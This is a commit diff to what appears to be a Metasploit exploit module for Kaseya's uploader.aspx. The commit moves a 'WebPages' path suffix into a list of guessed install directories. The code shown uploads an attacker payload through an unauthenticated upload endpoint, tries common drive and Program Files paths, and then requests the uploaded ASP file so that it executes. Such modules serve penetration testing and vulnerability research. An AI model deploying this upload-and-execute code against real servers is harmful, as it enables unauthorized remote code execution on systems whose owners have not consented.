Add WebPges to the paths

jvazquez-r7 · jvazquez-r7 · commit a88a6c55804d · 2015-10-01T13:22:56.000-05:00
diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb
@@ -60,13 +60,13 @@ def check
 
 
   def upload_file(payload, path, filename, session_id)
-    print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...")
+    print_status("#{peer} - Uploading payload to #{path}...")
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
       'vars_get' => {
-        'PathData' => path + 'WebPages' + '\\',
+        'PathData' => path,
         'qqfile' => filename
       },
       'data' => payload,
@@ -100,20 +100,20 @@ def exploit
 
     paths = [
       # We have to guess the path, so just try the most common directories
-      'C:\\Kaseya\\',
-      'C:\\Program Files\\Kaseya\\',
-      'C:\\Program Files (x86)\\Kaseya\\',
-      'D:\\Kaseya\\',
-      'D:\\Program Files\\Kaseya\\',
-      'D:\\Program Files (x86)\\Kaseya\\',
-      'E:\\Kaseya\\',
-      'E:\\Program Files\\Kaseya\\',
-      'E:\\Program Files (x86)\\Kaseya\\',
+      'C:\\Kaseya\\WebPages\\',
+      'C:\\Program Files\\Kaseya\\WebPages\\',
+      'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
+      'D:\\Kaseya\\WebPages\\',
+      'D:\\Program Files\\Kaseya\\WebPages\\',
+      'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
+      'E:\\Kaseya\\WebPages\\',
+      'E:\\Program Files\\Kaseya\\WebPages\\',
+      'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
     ]
 
     paths.each do |path|
       if upload_file(payload, path, asp_name, session_id)
-        register_files_for_cleanup(path + "WebPages\\" + asp_name)
+        register_files_for_cleanup(path + asp_name)
         print_status("#{peer} - Executing payload #{asp_name}")
 
         send_request_cgi({
